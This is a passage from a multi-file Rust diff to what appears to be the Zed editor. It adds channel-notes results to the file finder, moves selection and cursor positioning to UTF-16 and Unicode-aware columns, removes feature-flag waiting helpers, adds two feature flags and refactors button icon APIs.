+ let end_column = std::cmp::min(positions.end, line_len_utf16);
+ let end = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, end_column));
(start, end)
};
@@ -510,7 +509,7 @@ impl SelectionsCollection {
row = new_row.row();
let buffer_row = new_row.to_point(display_map).row;
- if let Some(selection) = self.build_columnar_selection_from_buffer_columns(
+ if let Some(selection) = self.build_columnar_selection_from_utf16_columns(
display_map,
buffer_row,
goal_columns,
@@ -119,7 +119,7 @@ impl Editor {
for_server: Option<RefreshForServer>,
cx: &mut Context<Self>,
) {
- if !self.mode().is_full() || !self.semantic_token_state.enabled() {
+ if !self.lsp_data_enabled() || !self.semantic_token_state.enabled() {
self.invalidate_semantic_tokens(None);
self.display_map.update(cx, |display_map, _| {
match Arc::get_mut(&mut display_map.semantic_token_highlights) {
@@ -6,9 +6,11 @@ use std::{
use buffer_diff::{BufferDiff, BufferDiffSnapshot};
use collections::HashMap;
-use gpui::{Action, AppContext as _, Entity, EventEmitter, Focusable, Subscription, WeakEntity};
+use gpui::{
+ Action, AppContext as _, Entity, EventEmitter, Focusable, Font, Subscription, WeakEntity,
+};
use itertools::Itertools;
-use language::{Buffer, Capability};
+use language::{Buffer, Capability, HighlightedText};
use multi_buffer::{
Anchor, BufferOffset, ExcerptId, ExcerptRange, ExpandExcerptDirection, MultiBuffer,
MultiBufferDiffHunk, MultiBufferPoint, MultiBufferSnapshot, PathKey,
@@ -29,7 +31,7 @@ use crate::{
};
use workspace::{
ActivatePaneLeft, ActivatePaneRight, Item, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemBufferKind, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemBufferKind, ItemEvent, SaveOptions, TabContentParams},
searchable::{SearchEvent, SearchToken, SearchableItem, SearchableItemHandle},
};
@@ -446,6 +448,9 @@ impl SplittableEditor {
let mut editor =
Editor::for_multibuffer(rhs_multibuffer.clone(), Some(project.clone()), window, cx);
editor.set_expand_all_diff_hunks(cx);
+ editor.disable_runnables();
+ editor.disable_diagnostics(cx);
+ editor.set_minimap_visibility(crate::MinimapVisibility::Disabled, window, cx);
editor
});
// TODO(split-diff) we might want to tag editor events with whether they came from rhs/lhs
@@ -1850,7 +1855,7 @@ impl Item for SplittableEditor {
self.rhs_editor.read(cx).breadcrumb_location(cx)
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.rhs_editor.read(cx).breadcrumbs(cx)
}
@@ -1,110 +0,0 @@
-use crate::Editor;
-
-use collections::HashMap;
-use gpui::{App, Task, Window};
-use lsp::LanguageServerName;
-use project::{Location, project_settings::ProjectSettings};
-use settings::Settings as _;
-use task::{TaskContext, TaskVariables, VariableName};
-use text::{BufferId, ToOffset, ToPoint};
-
-impl Editor {
- pub fn task_context(&self, window: &mut Window, cx: &mut App) -> Task<Option<TaskContext>> {
- let Some(project) = self.project.clone() else {
- return Task::ready(None);
- };
- let (selection, buffer, editor_snapshot) = {
- let selection = self.selections.newest_adjusted(&self.display_snapshot(cx));
- let Some((buffer, _)) = self
- .buffer()
- .read(cx)
- .point_to_buffer_offset(selection.start, cx)
- else {
- return Task::ready(None);
- };
- let snapshot = self.snapshot(window, cx);
- (selection, buffer, snapshot)
- };
- let selection_range = selection.range();
- let start = editor_snapshot
- .display_snapshot
- .buffer_snapshot()
- .anchor_after(selection_range.start)
- .text_anchor;
- let end = editor_snapshot
- .display_snapshot
- .buffer_snapshot()
- .anchor_after(selection_range.end)
- .text_anchor;
- let location = Location {
- buffer,
- range: start..end,
- };
- let captured_variables = {
- let mut variables = TaskVariables::default();
- let buffer = location.buffer.read(cx);
- let buffer_id = buffer.remote_id();
- let snapshot = buffer.snapshot();
- let starting_point = location.range.start.to_point(&snapshot);
- let starting_offset = starting_point.to_offset(&snapshot);
- for (_, tasks) in self
- .tasks
- .range((buffer_id, 0)..(buffer_id, starting_point.row + 1))
- {
- if !tasks
- .context_range
- .contains(&crate::BufferOffset(starting_offset))
- {
- continue;
- }
- for (capture_name, value) in tasks.extra_variables.iter() {
- variables.insert(
- VariableName::Custom(capture_name.to_owned().into()),
- value.clone(),
- );
- }
- }
- variables
- };
-
- project.update(cx, |project, cx| {
- project.task_store().update(cx, |task_store, cx| {
- task_store.task_context_for_location(captured_variables, location, cx)
- })
- })
- }
-
- pub fn lsp_task_sources(&self, cx: &App) -> HashMap<LanguageServerName, Vec<BufferId>> {
- let lsp_settings = &ProjectSettings::get_global(cx).lsp;
-
- self.buffer()
- .read(cx)
- .all_buffers()
- .into_iter()
- .filter_map(|buffer| {
- let lsp_tasks_source = buffer
- .read(cx)
- .language()?
- .context_provider()?
- .lsp_task_source()?;
- if lsp_settings
- .get(&lsp_tasks_source)
- .is_none_or(|s| s.enable_lsp_tasks)
- {
- let buffer_id = buffer.read(cx).remote_id();
- Some((lsp_tasks_source, buffer_id))
- } else {
- None
- }
- })
- .fold(
- HashMap::default(),
- |mut acc, (lsp_task_source, buffer_id)| {
- acc.entry(lsp_task_source)
- .or_insert_with(Vec::new)
- .push(buffer_id);
- acc
- },
- )
- }
-}
@@ -328,6 +328,9 @@ impl ExampleContext {
"{}Bug: Tool confirmation should not be required in eval",
log_prefix
),
+ ThreadEvent::Plan(plan) => {
+ println!("{log_prefix} Got plan: {plan:?}");
+ }
ThreadEvent::SubagentSpawned(session) => {
println!("{log_prefix} Got subagent spawn: {session:?}");
}
@@ -50,6 +50,7 @@ use gpui::{AppContext as _, AsyncApp, Entity, UpdateGlobal};
use language_model::{LanguageModelRegistry, SelectedModel};
use project::Project;
use settings::SettingsStore;
+use util::path_list::PathList;
use crate::headless::AgentCliAppState;
@@ -357,24 +358,24 @@ async fn run_agent(
Err(e) => return (Err(e), None),
};
- let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = match NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- app_state.fs.clone(),
- cx,
- )
- .await
- {
- Ok(a) => a,
- Err(e) => return (Err(e).context("creating agent"), None),
- };
+ let agent = cx.update(|cx| {
+ let thread_store = cx.new(|cx| ThreadStore::new(cx));
+ NativeAgent::new(
+ thread_store,
+ Templates::new(),
+ None,
+ app_state.fs.clone(),
+ cx,
+ )
+ });
let connection = Rc::new(NativeAgentConnection(agent.clone()));
let acp_thread = match cx
- .update(|cx| connection.clone().new_session(project, workdir, cx))
+ .update(|cx| {
+ connection
+ .clone()
+ .new_session(project, PathList::new(&[workdir]), cx)
+ })
.await
{
Ok(t) => t,
@@ -11,7 +11,6 @@ use std::sync::Arc;
use ::lsp::LanguageServerName;
use anyhow::{Context as _, Result, bail};
use async_trait::async_trait;
-use fs::normalize_path;
use gpui::{App, Task};
use language::LanguageName;
use semver::Version;
@@ -57,7 +56,7 @@ pub trait Extension: Send + Sync + 'static {
/// Returns a path relative to this extension's working directory.
fn path_from_extension(&self, path: &Path) -> PathBuf {
- normalize_path(&self.work_dir().join(path))
+ util::normalize_path(&self.work_dir().join(path))
}
async fn language_server_command(
@@ -1,12 +1,13 @@
use std::collections::HashMap;
use std::sync::{Arc, OnceLock};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use extension_host::ExtensionStore;
use gpui::{AppContext as _, Context, Entity, SharedString, Window};
use language::Buffer;
use ui::prelude::*;
+use util::ResultExt;
use util::rel_path::RelPath;
use workspace::notifications::simple_message_notification::MessageNotification;
use workspace::{Workspace, notifications::NotificationId};
@@ -147,7 +148,8 @@ pub(crate) fn suggest(buffer: Entity<Buffer>, window: &mut Window, cx: &mut Cont
};
let key = language_extension_key(&extension_id);
- let Ok(None) = KEY_VALUE_STORE.read_kvp(&key) else {
+ let kvp = KeyValueStore::global(cx);
+ let Ok(None) = kvp.read_kvp(&key) else {
return;
};
@@ -193,9 +195,11 @@ pub(crate) fn suggest(buffer: Entity<Buffer>, window: &mut Window, cx: &mut Cont
.secondary_icon_color(Color::Error)
.secondary_on_click(move |_window, cx| {
let key = language_extension_key(&extension_id);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(key, "dismissed".to_string())
- });
+ let kvp = KeyValueStore::global(cx);
+ cx.background_spawn(async move {
+ kvp.write_kvp(key, "dismissed".to_string()).await.log_err()
+ })
+ .detach();
})
})
});
@@ -1056,10 +1056,11 @@ impl ExtensionsPage {
"Install",
)
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click({
let extension_id = extension.id.clone();
move |_, _, cx| {
@@ -1078,10 +1079,11 @@ impl ExtensionsPage {
"Install",
)
.style(ButtonStyle::Tinted(ui::TintColor::Accent))
- .icon(IconName::Download)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::Download)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.disabled(true),
configure: None,
upgrade: None,
@@ -1479,10 +1481,11 @@ impl ExtensionsPage {
}
});
let open_registry_button = Button::new("open_registry", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click({
move |_event, _window, cx| {
telemetry::event!(
@@ -1520,9 +1523,7 @@ impl ExtensionsPage {
cx: &mut Context<Self>,
) -> impl IntoElement {
let docs_url_button = Button::new("open_docs", "View Documentation")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small))
.on_click({
move |_event, _window, cx| {
telemetry::event!(
@@ -12,5 +12,4 @@ workspace = true
path = "src/feature_flags.rs"
[dependencies]
-futures.workspace = true
gpui.workspace = true
@@ -3,12 +3,8 @@ mod flags;
use std::cell::RefCell;
use std::rc::Rc;
use std::sync::LazyLock;
-use std::time::Duration;
-use std::{future::Future, pin::Pin, task::Poll};
-use futures::channel::oneshot;
-use futures::{FutureExt, select_biased};
-use gpui::{App, Context, Global, Subscription, Task, Window};
+use gpui::{App, Context, Global, Subscription, Window};
pub use flags::*;
@@ -122,11 +118,6 @@ pub struct OnFlagsReady {
}
pub trait FeatureFlagAppExt {
- fn wait_for_flag<T: FeatureFlag>(&mut self) -> WaitForFlag;
-
- /// Waits for the specified feature flag to resolve, up to the given timeout.
- fn wait_for_flag_or_timeout<T: FeatureFlag>(&mut self, timeout: Duration) -> Task<bool>;
-
fn update_flags(&mut self, staff: bool, flags: Vec<String>);
fn set_staff(&mut self, staff: bool);
fn has_flag<T: FeatureFlag>(&self) -> bool;
@@ -192,54 +183,4 @@ impl FeatureFlagAppExt for App {
callback(feature_flags.has_flag::<T>(), cx);
})
}
-
- fn wait_for_flag<T: FeatureFlag>(&mut self) -> WaitForFlag {
- let (tx, rx) = oneshot::channel::<bool>();
- let mut tx = Some(tx);
- let subscription: Option<Subscription>;
-
- match self.try_global::<FeatureFlags>() {
- Some(feature_flags) => {
- subscription = None;
- tx.take().unwrap().send(feature_flags.has_flag::<T>()).ok();
- }
- None => {
- subscription = Some(self.observe_global::<FeatureFlags>(move |cx| {
- let feature_flags = cx.global::<FeatureFlags>();
- if let Some(tx) = tx.take() {
- tx.send(feature_flags.has_flag::<T>()).ok();
- }
- }));
- }
- }
-
- WaitForFlag(rx, subscription)
- }
-
- fn wait_for_flag_or_timeout<T: FeatureFlag>(&mut self, timeout: Duration) -> Task<bool> {
- let wait_for_flag = self.wait_for_flag::<T>();
-
- self.spawn(async move |cx| {
- let mut wait_for_flag = wait_for_flag.fuse();
- let mut timeout = FutureExt::fuse(cx.background_executor().timer(timeout));
-
- select_biased! {
- is_enabled = wait_for_flag => is_enabled,
- _ = timeout => false,
- }
- })
- }
-}
-
-pub struct WaitForFlag(oneshot::Receiver<bool>, Option<Subscription>);
-
-impl Future for WaitForFlag {
- type Output = bool;
-
- fn poll(mut self: Pin<&mut Self>, cx: &mut core::task::Context<'_>) -> Poll<Self::Output> {
- self.0.poll_unpin(cx).map(|result| {
- self.1.take();
- result.unwrap_or(false)
- })
- }
}
@@ -62,3 +62,23 @@ impl FeatureFlag for StreamingEditFileToolFeatureFlag {
true
}
}
+
+pub struct UpdatePlanToolFeatureFlag;
+
+impl FeatureFlag for UpdatePlanToolFeatureFlag {
+ const NAME: &'static str = "update-plan-tool";
+
+ fn enabled_for_staff() -> bool {
+ true
+ }
+}
+
+pub struct ProjectPanelUndoRedoFeatureFlag;
+
+impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag {
+ const NAME: &'static str = "project-panel-undo-redo";
+
+ fn enabled_for_staff() -> bool {
+ false
+ }
+}
@@ -14,6 +14,8 @@ doctest = false
[dependencies]
anyhow.workspace = true
+channel.workspace = true
+client.workspace = true
collections.workspace = true
editor.workspace = true
file_icons.workspace = true
@@ -26,7 +28,6 @@ picker.workspace = true
project.workspace = true
settings.workspace = true
serde.workspace = true
-text.workspace = true
theme.workspace = true
ui.workspace = true
util.workspace = true
@@ -45,3 +46,4 @@ serde_json.workspace = true
theme = { workspace = true, features = ["test-support"] }
workspace = { workspace = true, features = ["test-support"] }
zlog.workspace = true
+remote_connection = { workspace = true, features = ["test-support"] }
@@ -4,10 +4,12 @@ mod file_finder_tests;
use futures::future::join_all;
pub use open_path_prompt::OpenPathDelegate;
+use channel::ChannelStore;
+use client::ChannelId;
use collections::HashMap;
use editor::Editor;
use file_icons::FileIcons;
-use fuzzy::{CharBag, PathMatch, PathMatchCandidate};
+use fuzzy::{CharBag, PathMatch, PathMatchCandidate, StringMatch, StringMatchCandidate};
use gpui::{
Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, Styled, Task, WeakEntity,
@@ -33,7 +35,6 @@ use std::{
atomic::{self, AtomicBool},
},
};
-use text::Point;
use ui::{
ButtonLike, ContextMenu, HighlightedLabel, Indicator, KeyBinding, ListItem, ListItemSpacing,
PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, prelude::*,
@@ -45,8 +46,8 @@ use util::{
rel_path::RelPath,
};
use workspace::{
- ModalView, OpenOptions, OpenVisible, SplitDirection, Workspace, item::PreviewTabsSettings,
- notifications::NotifyResultExt, pane,
+ ModalView, OpenChannelNotesById, OpenOptions, OpenVisible, SplitDirection, Workspace,
+ item::PreviewTabsSettings, notifications::NotifyResultExt, pane,
};
use zed_actions::search::ToggleIncludeIgnored;
@@ -321,7 +322,7 @@ impl FileFinder {
if let Some(workspace) = delegate.workspace.upgrade()
&& let Some(m) = delegate.matches.get(delegate.selected_index())
{
- let path = match &m {
+ let path = match m {
Match::History { path, .. } => {
let worktree_id = path.project.worktree_id;
ProjectPath {
@@ -334,6 +335,7 @@ impl FileFinder {
path: m.0.path.clone(),
},
Match::CreateNew(p) => p.clone(),
+ Match::Channel { .. } => return,
};
let open_task = workspace.update(cx, move |workspace, cx| {
workspace.split_path_preview(path, false, Some(split_direction), window, cx)
@@ -392,6 +394,7 @@ pub struct FileFinderDelegate {
file_finder: WeakEntity<FileFinder>,
workspace: WeakEntity<Workspace>,
project: Entity<Project>,
+ channel_store: Option<Entity<ChannelStore>>,
search_count: usize,
latest_search_id: usize,
latest_search_did_cancel: bool,
@@ -450,13 +453,18 @@ struct Matches {
matches: Vec<Match>,
}
-#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Clone)]
+#[derive(Debug, Clone)]
enum Match {
History {
path: FoundPath,
panel_match: Option<ProjectPanelOrdMatch>,
},
Search(ProjectPanelOrdMatch),
+ Channel {
+ channel_id: ChannelId,
+ channel_name: SharedString,
+ string_match: StringMatch,
+ },
CreateNew(ProjectPath),
}
@@ -465,7 +473,7 @@ impl Match {
match self {
Match::History { path, .. } => Some(&path.project.path),
Match::Search(panel_match) => Some(&panel_match.0.path),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
@@ -479,7 +487,7 @@ impl Match {
.read(cx)
.absolutize(&path_match.path),
),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
@@ -487,7 +495,7 @@ impl Match {
match self {
Match::History { panel_match, .. } => panel_match.as_ref(),
Match::Search(panel_match) => Some(panel_match),
- Match::CreateNew(_) => None,
+ Match::Channel { .. } | Match::CreateNew(_) => None,
}
}
}
@@ -554,18 +562,21 @@ impl Matches {
.extend(history_items.into_iter().map(path_to_entry));
return;
};
- // If several worktress are open we have to set the worktree root names in path prefix
- let several_worktrees = worktree_store.read(cx).worktrees().count() > 1;
- let worktree_name_by_id = several_worktrees.then(|| {
- worktree_store
- .read(cx)
- .worktrees()
- .map(|worktree| {
- let snapshot = worktree.read(cx).snapshot();
- (snapshot.id(), snapshot.root_name().into())
- })
- .collect()
- });
+
+ let worktree_name_by_id = if should_hide_root_in_entry_path(&worktree_store, cx) {
+ None
+ } else {
+ Some(
+ worktree_store
+ .read(cx)
+ .worktrees()
+ .map(|worktree| {
+ let snapshot = worktree.read(cx).snapshot();
+ (snapshot.id(), snapshot.root_name().into())
+ })
+ .collect(),
+ )
+ };
let new_history_matches = matching_history_items(
history_items,
currently_opened,
@@ -628,7 +639,6 @@ impl Matches {
(_, Match::CreateNew(_)) => return cmp::Ordering::Greater,
_ => {}
}
- debug_assert!(a.panel_match().is_some() && b.panel_match().is_some());
match (&a, &b) {
// bubble currently opened files to the top
@@ -651,32 +661,35 @@ impl Matches {
}
}
- let a_panel_match = match a.panel_match() {
- Some(pm) => pm,
- None => {
- return if b.panel_match().is_some() {
- cmp::Ordering::Less
- } else {
- cmp::Ordering::Equal
- };
+ // For file-vs-file matches, use the existing detailed comparison.
+ if let (Some(a_panel), Some(b_panel)) = (a.panel_match(), b.panel_match()) {
+ let a_in_filename = Self::is_filename_match(a_panel);
+ let b_in_filename = Self::is_filename_match(b_panel);
+
+ match (a_in_filename, b_in_filename) {
+ (true, false) => return cmp::Ordering::Greater,
+ (false, true) => return cmp::Ordering::Less,
+ _ => {}
}
- };
- let b_panel_match = match b.panel_match() {
- Some(pm) => pm,
- None => return cmp::Ordering::Greater,
- };
+ return a_panel.cmp(b_panel);
+ }
- let a_in_filename = Self::is_filename_match(a_panel_match);
- let b_in_filename = Self::is_filename_match(b_panel_match);
+ let a_score = Self::match_score(a);
+ let b_score = Self::match_score(b);
+ // When at least one side is a channel, compare by raw score.
+ a_score
+ .partial_cmp(&b_score)
+ .unwrap_or(cmp::Ordering::Equal)
+ }
- match (a_in_filename, b_in_filename) {
- (true, false) => return cmp::Ordering::Greater,
- (false, true) => return cmp::Ordering::Less,
- _ => {} // Both are filename matches or both are path matches
+ fn match_score(m: &Match) -> f64 {
+ match m {
+ Match::History { panel_match, .. } => panel_match.as_ref().map_or(0.0, |pm| pm.0.score),
+ Match::Search(pm) => pm.0.score,
+ Match::Channel { string_match, .. } => string_match.score,
+ Match::CreateNew(_) => 0.0,
}
-
- a_panel_match.cmp(b_panel_match)
}
/// Determines if the match occurred within the filename rather than in the path
@@ -786,6 +799,16 @@ fn matching_history_items<'a>(
matching_history_paths
}
+fn should_hide_root_in_entry_path(worktree_store: &Entity<WorktreeStore>, cx: &App) -> bool {
+ let multiple_worktrees = worktree_store
+ .read(cx)
+ .visible_worktrees(cx)
+ .filter(|worktree| !worktree.read(cx).is_single_file())
+ .nth(1)
+ .is_some();
+ ProjectPanelSettings::get_global(cx).hide_root && !multiple_worktrees
+}
+
#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
struct FoundPath {
project: ProjectPath,
@@ -833,10 +856,16 @@ impl FileFinderDelegate {
cx: &mut Context<FileFinder>,
) -> Self {
Self::subscribe_to_updates(&project, window, cx);
+ let channel_store = if FileFinderSettings::get_global(cx).include_channels {
+ ChannelStore::try_global(cx)
+ } else {
+ None
+ };
Self {
file_finder,
workspace,
project,
+ channel_store,
search_count: 0,
latest_search_id: 0,
latest_search_did_cancel: false,
@@ -885,14 +914,12 @@ impl FileFinderDelegate {
.currently_opened_path
.as_ref()
.map(|found_path| Arc::clone(&found_path.project.path));
- let worktrees = self
- .project
- .read(cx)
- .worktree_store()
+ let worktree_store = self.project.read(cx).worktree_store();
+ let worktrees = worktree_store
.read(cx)
.visible_worktrees_and_single_files(cx)
.collect::<Vec<_>>();
- let include_root_name = worktrees.len() > 1;
+ let include_root_name = !should_hide_root_in_entry_path(&worktree_store, cx);
let candidate_sets = worktrees
.into_iter()
.map(|worktree| {
@@ -971,6 +998,68 @@ impl FileFinderDelegate {
path_style,
);
+ // Add channel matches
+ if let Some(channel_store) = &self.channel_store {
+ let channel_store = channel_store.read(cx);
+ let channels: Vec<_> = channel_store.channels().cloned().collect();
+ if !channels.is_empty() {
+ let candidates = channels
+ .iter()
+ .enumerate()
+ .map(|(id, channel)| StringMatchCandidate::new(id, &channel.name));
+ let channel_query = query.path_query();
+ let query_lower = channel_query.to_lowercase();
+ let mut channel_matches = Vec::new();
+ for candidate in candidates {
+ let channel_name = candidate.string;
+ let name_lower = channel_name.to_lowercase();
+
+ let mut positions = Vec::new();
+ let mut query_idx = 0;
+ for (name_idx, name_char) in name_lower.char_indices() {
+ if query_idx < query_lower.len() {
+ let query_char =
+ query_lower[query_idx..].chars().next().unwrap_or_default();
+ if name_char == query_char {
+ positions.push(name_idx);
+ query_idx += query_char.len_utf8();
+ }
+ }
+ }
+
+ if query_idx == query_lower.len() {
+ let channel = &channels[candidate.id];
+ let score = if name_lower == query_lower {
+ 1.0
+ } else if name_lower.starts_with(&query_lower) {
+ 0.8
+ } else {
+ 0.5 * (query_lower.len() as f64 / name_lower.len() as f64)
+ };
+ channel_matches.push(Match::Channel {
+ channel_id: channel.id,
+ channel_name: channel.name.clone(),
+ string_match: StringMatch {
+ candidate_id: candidate.id,
+ score,
+ positions,
+ string: channel_name,
+ },
+ });
+ }
+ }
+ for channel_match in channel_matches {
+ match self
+ .matches
+ .position(&channel_match, self.currently_opened_path.as_ref())
+ {
+ Ok(_duplicate) => {}
+ Err(ix) => self.matches.matches.insert(ix, channel_match),
+ }
+ }
+ }
+ }
+
let query_path = query.raw_query.as_str();
if let Ok(mut query_path) = RelPath::new(Path::new(query_path), path_style) {
let available_worktree = self
@@ -1056,17 +1145,8 @@ impl FileFinderDelegate {
if let Some(panel_match) = panel_match {
self.labels_for_path_match(&panel_match.0, path_style)
} else if let Some(worktree) = worktree {
- let multiple_folders_open = self
- .project
- .read(cx)
- .visible_worktrees(cx)
- .filter(|worktree| !worktree.read(cx).is_single_file())
- .nth(1)
- .is_some();
-
- let full_path = if ProjectPanelSettings::get_global(cx).hide_root
- && !multiple_folders_open
- {
+ let worktree_store = self.project.read(cx).worktree_store();
+ let full_path = if should_hide_root_in_entry_path(&worktree_store, cx) {
entry_path.project.path.clone()
} else {
worktree.read(cx).root_name().join(&entry_path.project.path)
@@ -1095,6 +1175,16 @@ impl FileFinderDelegate {
}
}
Match::Search(path_match) => self.labels_for_path_match(&path_match.0, path_style),
+ Match::Channel {
+ channel_name,
+ string_match,
+ ..
+ } => (
+ channel_name.to_string(),
+ string_match.positions.clone(),
+ "Channel Notes".to_string(),
+ vec![],
+ ),
Match::CreateNew(project_path) => (
format!("Create file: {}", project_path.path.display(path_style)),
vec![],
@@ -1479,6 +1569,16 @@ impl PickerDelegate for FileFinderDelegate {
if let Some(m) = self.matches.get(self.selected_index())
&& let Some(workspace) = self.workspace.upgrade()
{
+ // Channel matches are handled separately since they dispatch an action
+ // rather than directly opening a file path.
+ if let Match::Channel { channel_id, .. } = m {
+ let channel_id = channel_id.0;
+ let finder = self.file_finder.clone();
+ window.dispatch_action(OpenChannelNotesById { channel_id }.boxed_clone(), cx);
+ finder.update(cx, |_, cx| cx.emit(DismissEvent)).log_err();
+ return;
+ }
+
let open_task = workspace.update(cx, |workspace, cx| {
let split_or_open =
|workspace: &mut Workspace,
@@ -1571,6 +1671,7 @@ impl PickerDelegate for FileFinderDelegate {
window,
cx,
),
+ Match::Channel { .. } => unreachable!("handled above"),
}
});
@@ -1598,7 +1699,12 @@ impl PickerDelegate for FileFinderDelegate {
active_editor
.downgrade()
.update_in(cx, |editor, window, cx| {
- editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx);
+ let Some(buffer) = editor.buffer().read(cx).as_singleton() else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point = buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
})
.log_err();
}
@@ -1627,7 +1733,7 @@ impl PickerDelegate for FileFinderDelegate {
let path_match = self.matches.get(ix)?;
- let history_icon = match &path_match {
+ let end_icon = match path_match {
Match::History { .. } => Icon::new(IconName::HistoryRerun)
.color(Color::Muted)
.size(IconSize::Small)
@@ -1636,6 +1742,10 @@ impl PickerDelegate for FileFinderDelegate {
.flex_none()
.size(IconSize::Small.rems())
.into_any_element(),
+ Match::Channel { .. } => v_flex()
+ .flex_none()
+ .size(IconSize::Small.rems())
+ .into_any_element(),
Match::CreateNew(_) => Icon::new(IconName::Plus)
.color(Color::Muted)
.size(IconSize::Small)
@@ -1643,21 +1753,24 @@ impl PickerDelegate for FileFinderDelegate {
};
let (file_name_label, full_path_label) = self.labels_for_match(path_match, window, cx);
- let file_icon = maybe!({
- if !settings.file_icons {
- return None;
- }
- let abs_path = path_match.abs_path(&self.project, cx)?;
- let file_name = abs_path.file_name()?;
- let icon = FileIcons::get_icon(file_name.as_ref(), cx)?;
- Some(Icon::from_path(icon).color(Color::Muted))
- });
+ let file_icon = match path_match {
+ Match::Channel { .. } => Some(Icon::new(IconName::Hash).color(Color::Muted)),
+ _ => maybe!({
+ if !settings.file_icons {
+ return None;
+ }
+ let abs_path = path_match.abs_path(&self.project, cx)?;
+ let file_name = abs_path.file_name()?;
+ let icon = FileIcons::get_icon(file_name.as_ref(), cx)?;
+ Some(Icon::from_path(icon).color(Color::Muted))
+ }),
+ };
Some(
ListItem::new(ix)
.spacing(ListItemSpacing::Sparse)
.start_slot::<Icon>(file_icon)
- .end_slot::<AnyElement>(history_icon)
+ .end_slot::<AnyElement>(end_icon)
.inset(true)
.toggle_state(selected)
.child(
@@ -400,6 +400,18 @@ async fn test_absolute_paths(cx: &mut TestAppContext) {
#[gpui::test]
async fn test_complex_path(cx: &mut TestAppContext) {
let app_state = init_test(cx);
+
+ cx.update(|cx| {
+ let settings = *ProjectPanelSettings::get_global(cx);
+ ProjectPanelSettings::override_global(
+ ProjectPanelSettings {
+ hide_root: true,
+ ..settings
+ },
+ cx,
+ );
+ });
+
app_state
.fs
.as_fake()
@@ -509,6 +521,91 @@ async fn test_row_column_numbers_query_inside_file(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_row_column_numbers_query_inside_unicode_file(cx: &mut TestAppContext) {
+ let app_state = init_test(cx);
+
+ let first_file_name = "first.rs";
+ let first_file_contents = "aéøbcdef";
+ app_state
+ .fs
+ .as_fake()
+ .insert_tree(
+ path!("/src"),
+ json!({
+ "test": {
+ first_file_name: first_file_contents,
+ "second.rs": "// Second Rust file",
+ }
+ }),
+ )
+ .await;
+
+ let project = Project::test(app_state.fs.clone(), [path!("/src").as_ref()], cx).await;
+
+ let (picker, workspace, cx) = build_find_picker(project, cx);
+
+ let file_query = &first_file_name[..3];
+ let file_row = 1;
+ let file_column = 5;
+ let query_inside_file = format!("{file_query}:{file_row}:{file_column}");
+ picker
+ .update_in(cx, |finder, window, cx| {
+ finder
+ .delegate
+ .update_matches(query_inside_file.to_string(), window, cx)
+ })
+ .await;
+ picker.update(cx, |finder, _| {
+ assert_match_at_position(finder, 1, &query_inside_file.to_string());
+ let finder = &finder.delegate;
+ assert_eq!(finder.matches.len(), 2);
+ let latest_search_query = finder
+ .latest_search_query
+ .as_ref()
+ .expect("Finder should have a query after the update_matches call");
+ assert_eq!(latest_search_query.raw_query, query_inside_file);
+ assert_eq!(latest_search_query.file_query_end, Some(file_query.len()));
+ assert_eq!(latest_search_query.path_position.row, Some(file_row));
+ assert_eq!(latest_search_query.path_position.column, Some(file_column));
+ });
+
+ cx.dispatch_action(Confirm);
+
+ let editor = cx.update(|_, cx| workspace.read(cx).active_item_as::<Editor>(cx).unwrap());
+ cx.executor().advance_clock(Duration::from_secs(2));
+
+ let expected_column = first_file_contents
+ .chars()
+ .take(file_column as usize - 1)
+ .map(|character| character.len_utf8())
+ .sum::<usize>();
+
+ editor.update(cx, |editor, cx| {
+ let all_selections = editor.selections.all_adjusted(&editor.display_snapshot(cx));
+ assert_eq!(
+ all_selections.len(),
+ 1,
+ "Expected to have 1 selection (caret) after file finder confirm, but got: {all_selections:?}"
+ );
+ let caret_selection = all_selections.into_iter().next().unwrap();
+ assert_eq!(
+ caret_selection.start, caret_selection.end,
+ "Caret selection should have its start and end at the same position"
+ );
+ assert_eq!(
+ file_row,
+ caret_selection.start.row + 1,
+ "Query inside file should get caret with the same focus row"
+ );
+ assert_eq!(
+ expected_column,
+ caret_selection.start.column as usize,
+ "Query inside file should map user-visible columns to byte offsets for Unicode text"
+ );
+ });
+}
+
#[gpui::test]
async fn test_row_column_numbers_query_outside_file(cx: &mut TestAppContext) {
let app_state = init_test(cx);
